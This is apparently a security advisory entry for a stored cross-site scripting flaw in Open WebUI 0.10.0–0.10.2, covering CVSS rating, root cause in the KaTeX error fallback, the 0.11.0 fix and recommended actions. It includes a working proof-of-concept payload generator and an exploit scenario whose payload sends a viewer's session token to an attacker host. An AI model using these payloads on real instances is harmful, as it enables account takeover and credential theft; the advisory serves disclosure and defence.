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AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Network delivery of stored payload, no attack complexity, low-privilege account required, passive viewer interaction needed, cross-origin session impact with full confidentiality and integrity loss, no server availability effect.
Primary rating from Vendor (https://github.com/open-webui/open-webui).
CVSS VectorVendor: https://github.com/open-webui/open-webui
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
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Summary
Any authenticated user can store a chat message whose math block makes KaTeX fail with a stack overflow instead of a parse error. When that happens the renderer falls back to inserting the original math source into the page as HTML rather than as text, so script in the message runs in the browser of whoever views it. Every surface that renders messages is affected, including shared chats and channels, and the missing control is output escaping on the error path.
Preconditions
Default configuration, no flags involved. The attacker needs a normal user account and a way to get the target to open the content: a shared chat link, a channel the target reads, or any other message surface. No admin rights and no non-default settings are required on either side.
Impact
Script executes in the viewer's browser on the Open WebUI origin, which puts the session token in localStorage within reach and therefore allows taking over the viewing account. If the viewer is an administrator, that is administrator access to the instance. Exploitation needs the target to open the content, but nothing beyond that: no interaction with the message itself. Server-side data and availability are unaffected; the impact is entirely in the viewer's browser session.
Fix
Fixed in 0.11.0 by commit bc600d3f0 (PR #26718). The error path now HTML-escapes the math source before it reaches the DOM, so a failed render displays the formula as text instead of as markup. Upgrading fully resolves the issue; no configuration change is needed.
Root cause
Affected component: src/lib/components/chat/Messages/Markdown/KatexRenderer.svelte, the reactive block that renders math and its catch branch. Affected setup: releases 0.10.0 through 0.10.2, which are the versions carrying that fallback.
KaTeX was called with throwOnError: false, which suppresses parse errors but not a RangeError from deeply nested input. The surrounding catch treated any failure as "show the original formula" and assigned the untouched source to the value that the template inserts with {@html}. Because the Markdown math tokenizer captures everything between the delimiters verbatim, including angle brackets and complete tags, the attacker controls that string exactly.
Proof of concept
Send a chat message (or store one via any endpoint that writes message content) consisting of a single inline math block: an opening $, 100000 { characters, an <img src=x onerror=alert(document.domain)> tag, 100000 } characters, and a closing $.
python3 -c 'N=100000; print("$"+"{"*N+"<img src=x onerror=alert(document.domain)>"+"}"*N+"$")'Open the chat as any user who can view it. KaTeX overflows the stack, the fallback inserts the raw source, and the onerror handler fires. Replacing alert() with a request carrying localStorage.token sends the viewer's session token to an attacker-controlled host; this was demonstrated against a shared chat opened by an administrator account.
Credits
@maxntv - reported the unescaped KaTeX error fallback and demonstrated session-token theft through a shared chat.
AnalysisAI
Stored cross-site scripting in Open WebUI 0.10.0-0.10.2 allows any authenticated user to craft a math block that causes a KaTeX RangeError (stack overflow from deeply nested braces), forcing the KatexRenderer.svelte error fallback to inject unescaped HTML directly into the DOM via Svelte's {@html} directive. Any user who subsequently views the message - including administrators - executes attacker-controlled JavaScript on the Open WebUI origin, enabling session token theft from localStorage and full account takeover. …
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| Exploitation | The attacker must hold a valid, low-privileged Open WebUI user account on the target instance (confirmed by CVSS PR:L); no administrative role, no special permission, and no non-default configuration are required on either the attacker or victim side. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-assigned CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, score 8.7) is independently supported by the description. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a standard Open WebUI user account posts a single message to a shared chat or a channel the target reads; the message body is a `$`-delimited inline math block containing 100,000 opening braces, an `<img src=x onerror=fetch('https://attacker.com/?t='+localStorage.token)>` payload, and 100,000 closing braces. When the target opens the chat - even passively, without interacting with the message - KaTeX overflows its call stack processing the nested braces, the catch block injects the raw string via `{@html}`, the image tag is rendered, and the `onerror` handler exfiltrates the viewer's session token; a public proof-of-concept confirming administrator account takeover via this exact flow is documented in the GHSA advisory. |
| Remediation | The definitive fix is to upgrade Open WebUI to version 0.11.0 or later; no configuration change is needed and the upgrade fully resolves the vulnerability. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, inventory all Open WebUI deployments and identify instances running versions 0.10.0-0.10.2; immediately disable math block rendering and restrict message creation to trusted administrators as interim containment. …
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EUVD-2026-52923
GHSA-pwxh-7358-jq2x